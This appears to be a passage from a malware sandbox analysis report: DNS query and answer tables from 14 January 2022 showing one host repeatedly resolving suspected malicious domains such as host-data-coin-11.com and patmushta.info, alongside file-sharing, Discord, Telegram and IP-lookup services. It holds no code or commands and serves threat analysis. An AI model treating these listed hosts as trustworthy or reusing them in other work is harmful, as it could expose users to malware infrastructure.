                                                                                                                      Jan 14, 2022 21:05:16.979959965 CET192.168.2.58.8.8.80x5162Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:17.161175013 CET192.168.2.58.8.8.80xdbe6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:28.889240980 CET192.168.2.58.8.8.80xc6abStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:31.535420895 CET192.168.2.58.8.8.80xd6faStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:38.788865089 CET192.168.2.58.8.8.80x5d88Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:38.973396063 CET192.168.2.58.8.8.80xc0e2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:39.412410975 CET192.168.2.58.8.8.80x35d4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:39.601656914 CET192.168.2.58.8.8.80xda93Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.071396112 CET192.168.2.58.8.8.80x6de5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.235871077 CET192.168.2.58.8.8.80x6600Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.415290117 CET192.168.2.58.8.8.80xc569Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.594440937 CET192.168.2.58.8.8.80xd440Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.760528088 CET192.168.2.58.8.8.80xe780Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.929953098 CET192.168.2.58.8.8.80xf572Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:41.097774982 CET192.168.2.58.8.8.80x6af7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:41.270361900 CET192.168.2.58.8.8.80x53f1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:41.448005915 CET192.168.2.58.8.8.80xf55fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:41.652324915 CET192.168.2.58.8.8.80x9aa7Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:44.983249903 CET192.168.2.58.8.8.80x6528Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:45.159842968 CET192.168.2.58.8.8.80x8d7cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:45.366871119 CET192.168.2.58.8.8.80xaab3Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:45.883004904 CET192.168.2.58.8.8.80xc70fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.052864075 CET192.168.2.58.8.8.80x618aStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.254223108 CET192.168.2.58.8.8.80x1909Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.441540003 CET192.168.2.58.8.8.80xa099Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.627866030 CET192.168.2.58.8.8.80x2c58Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.859006882 CET192.168.2.58.8.8.80x4dacStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:47.035129070 CET192.168.2.58.8.8.80xda7cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:54.463512897 CET192.168.2.58.8.8.80x1e0cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:54.629339933 CET192.168.2.58.8.8.80xc241Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:56.111166954 CET192.168.2.58.8.8.80x927aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:56.279705048 CET192.168.2.58.8.8.80xa1dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:56.445163965 CET192.168.2.58.8.8.80x77e6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:56.622380018 CET192.168.2.58.8.8.80xdc86Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:59.973757029 CET192.168.2.58.8.8.80x109bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:00.155663013 CET192.168.2.58.8.8.80xa8a6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:00.540651083 CET192.168.2.58.8.8.80xa441Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:03.809344053 CET192.168.2.58.8.8.80x1cf8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:04.012093067 CET192.168.2.58.8.8.80xab6bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:04.175112009 CET192.168.2.58.8.8.80xc3c1Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:05.754617929 CET192.168.2.58.8.8.80xcdcdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:05.994390011 CET192.168.2.58.8.8.80x1c4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:11.553761959 CET192.168.2.58.8.8.80x40edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:11.800241947 CET192.168.2.58.8.8.80x1d4cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:11.997239113 CET192.168.2.58.8.8.80xbaf8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:12.131275892 CET192.168.2.58.8.8.80x3b8eStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:12.174395084 CET192.168.2.58.8.8.80xa8a5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:12.431009054 CET192.168.2.58.8.8.80xe862Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:14.960942984 CET192.168.2.58.8.8.80xc20dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:15.144355059 CET192.168.2.58.8.8.80x2ad7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:15.331216097 CET192.168.2.58.8.8.80x31ffStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:16.744563103 CET192.168.2.58.8.8.80x3ccdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:16.906570911 CET192.168.2.58.8.8.80x497cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:17.084588051 CET192.168.2.58.8.8.80xc79cStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:18.430932999 CET192.168.2.58.8.8.80x98a1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:18.594903946 CET192.168.2.58.8.8.80xa8deStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:18.834065914 CET192.168.2.58.8.8.80x4b70Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:22.463624954 CET192.168.2.58.8.8.80x471dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:25.071058035 CET192.168.2.58.8.8.80x577dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.249953985 CET192.168.2.58.8.8.80x710eStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.282507896 CET192.168.2.58.8.8.80x8279Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.451266050 CET192.168.2.58.8.8.80x7bbaStandard query (0)ipwhois.appA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.736634016 CET192.168.2.58.8.8.80xcbd5Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.026542902 CET192.168.2.58.8.8.80xa536Standard query (0)c9d0e790b353537889bd47a364f5acff43c11f248.xyzA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.214611053 CET192.168.2.58.8.8.80xd2fbStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:30.452898026 CET192.168.2.58.8.8.80x9061Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:32.928822994 CET192.168.2.58.8.8.80xd453Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:34.723789930 CET192.168.2.58.8.8.80xa787Standard query (0)github.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:34.852749109 CET192.168.2.58.8.8.80x332dStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                      Jan 14, 2022 21:04:56.163722038 CET8.8.8.8192.168.2.50x7494No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:56.340941906 CET8.8.8.8192.168.2.50x4933No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:56.779325962 CET8.8.8.8192.168.2.50xe41dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:57.214174986 CET8.8.8.8192.168.2.50xf2bdNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:57.386841059 CET8.8.8.8192.168.2.50x4af2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:57.824347973 CET8.8.8.8192.168.2.50x1f4cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:59.204412937 CET8.8.8.8192.168.2.50xd444No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:59.685348034 CET8.8.8.8192.168.2.50x992bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:00.174863100 CET8.8.8.8192.168.2.50x1977No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:02.064315081 CET8.8.8.8192.168.2.50x7b24No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:02.544847012 CET8.8.8.8192.168.2.50xf3bfNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:03.024291039 CET8.8.8.8192.168.2.50x3fdaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:03.308669090 CET8.8.8.8192.168.2.50xb555No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:03.767642975 CET8.8.8.8192.168.2.50xea8fNo error (0)privacy-tools-for-you-780.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:06.007678986 CET8.8.8.8192.168.2.50x14b4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:06.259608984 CET8.8.8.8192.168.2.50xadd5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:07.209027052 CET8.8.8.8192.168.2.50x7f70No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:07.444776058 CET8.8.8.8192.168.2.50x3d00No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:07.674513102 CET8.8.8.8192.168.2.50x147dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:07.866856098 CET8.8.8.8192.168.2.50x31d8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:08.102863073 CET8.8.8.8192.168.2.50xb57cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:08.270349026 CET8.8.8.8192.168.2.50x9388No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:10.264030933 CET8.8.8.8192.168.2.50xf22fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:10.432816982 CET8.8.8.8192.168.2.50x2e3aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:10.602001905 CET8.8.8.8192.168.2.50x11d1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:10.796231985 CET8.8.8.8192.168.2.50xe372No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:13.323513985 CET8.8.8.8192.168.2.50x55No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:13.770212889 CET8.8.8.8192.168.2.50xf6a9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:13.964700937 CET8.8.8.8192.168.2.50x3e41No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:14.163177967 CET8.8.8.8192.168.2.50x7e8aNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:14.163177967 CET8.8.8.8192.168.2.50x7e8aNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:14.163177967 CET8.8.8.8192.168.2.50x7e8aNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:14.163177967 CET8.8.8.8192.168.2.50x7e8aNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:14.163177967 CET8.8.8.8192.168.2.50x7e8aNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:16.828425884 CET8.8.8.8192.168.2.50x780dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:16.997550011 CET8.8.8.8192.168.2.50x5162No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:17.479644060 CET8.8.8.8192.168.2.50xdbe6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:28.908535957 CET8.8.8.8192.168.2.50xc6abNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:28.908535957 CET8.8.8.8192.168.2.50xc6abNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:28.908535957 CET8.8.8.8192.168.2.50xc6abNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:28.908535957 CET8.8.8.8192.168.2.50xc6abNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:28.908535957 CET8.8.8.8192.168.2.50xc6abNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:28.908535957 CET8.8.8.8192.168.2.50xc6abNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:31.855371952 CET8.8.8.8192.168.2.50xd6faNo error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:38.808269978 CET8.8.8.8192.168.2.50x5d88No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:39.260253906 CET8.8.8.8192.168.2.50xc0e2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:39.431783915 CET8.8.8.8192.168.2.50x35d4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:39.887650013 CET8.8.8.8192.168.2.50xda93No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.091041088 CET8.8.8.8192.168.2.50x6de5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.254775047 CET8.8.8.8192.168.2.50x6600No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.434448957 CET8.8.8.8192.168.2.50xc569No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.613733053 CET8.8.8.8192.168.2.50xd440No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.777997971 CET8.8.8.8192.168.2.50xe780No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:40.949367046 CET8.8.8.8192.168.2.50xf572No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:41.115518093 CET8.8.8.8192.168.2.50x6af7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:41.289719105 CET8.8.8.8192.168.2.50x53f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:41.467417002 CET8.8.8.8192.168.2.50xf55fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:41.669790030 CET8.8.8.8192.168.2.50x9aa7No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:45.002109051 CET8.8.8.8192.168.2.50x6528No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:45.177006006 CET8.8.8.8192.168.2.50x8d7cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:45.388562918 CET8.8.8.8192.168.2.50xaab3No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:45.388562918 CET8.8.8.8192.168.2.50xaab3No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:45.901753902 CET8.8.8.8192.168.2.50xc70fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.076894999 CET8.8.8.8192.168.2.50x618aNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.273220062 CET8.8.8.8192.168.2.50x1909No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.460666895 CET8.8.8.8192.168.2.50xa099No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.649183035 CET8.8.8.8192.168.2.50x2c58No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:46.880328894 CET8.8.8.8192.168.2.50x4dacNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:47.054697990 CET8.8.8.8192.168.2.50xda7cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:54.481074095 CET8.8.8.8192.168.2.50x1e0cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:54.648716927 CET8.8.8.8192.168.2.50xc241No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:56.130471945 CET8.8.8.8192.168.2.50x927aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:56.298561096 CET8.8.8.8192.168.2.50xa1dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:56.462627888 CET8.8.8.8192.168.2.50x77e6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:56.639723063 CET8.8.8.8192.168.2.50xdc86No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:59.990679026 CET8.8.8.8192.168.2.50x109bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:00.174967051 CET8.8.8.8192.168.2.50xa8a6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:00.559953928 CET8.8.8.8192.168.2.50xa441No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:03.830070972 CET8.8.8.8192.168.2.50x1cf8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:04.031857014 CET8.8.8.8192.168.2.50xab6bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:04.479187965 CET8.8.8.8192.168.2.50xc3c1No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:05.771756887 CET8.8.8.8192.168.2.50xcdcdNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:06.013828039 CET8.8.8.8192.168.2.50x1c4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:11.572953939 CET8.8.8.8192.168.2.50x40edNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:11.819535017 CET8.8.8.8192.168.2.50x1d4cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:12.016437054 CET8.8.8.8192.168.2.50xbaf8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:12.193625927 CET8.8.8.8192.168.2.50xa8a5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:12.238771915 CET8.8.8.8192.168.2.50x3b8eNo error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:12.452526093 CET8.8.8.8192.168.2.50xe862No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:14.980345964 CET8.8.8.8192.168.2.50xc20dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:15.163513899 CET8.8.8.8192.168.2.50x2ad7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:15.351063967 CET8.8.8.8192.168.2.50x31ffNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:16.761666059 CET8.8.8.8192.168.2.50x3ccdNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:16.924042940 CET8.8.8.8192.168.2.50x497cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:17.104187012 CET8.8.8.8192.168.2.50xc79cNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:18.450618029 CET8.8.8.8192.168.2.50x98a1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:18.614340067 CET8.8.8.8192.168.2.50xa8deNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:18.853131056 CET8.8.8.8192.168.2.50x4b70No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:22.483175039 CET8.8.8.8192.168.2.50x471dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:25.090707064 CET8.8.8.8192.168.2.50x577dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:25.090707064 CET8.8.8.8192.168.2.50x577dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:25.090707064 CET8.8.8.8192.168.2.50x577dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:25.090707064 CET8.8.8.8192.168.2.50x577dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:25.090707064 CET8.8.8.8192.168.2.50x577dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.273663998 CET8.8.8.8192.168.2.50x710eNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.303054094 CET8.8.8.8192.168.2.50x8279No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.475207090 CET8.8.8.8192.168.2.50x7bbaNo error (0)ipwhois.app136.243.172.101A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.765475035 CET8.8.8.8192.168.2.50xcbd5No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.765475035 CET8.8.8.8192.168.2.50xcbd5No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:06:29.765475035 CET8.8.8.8192.168.2.50xcbd5No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
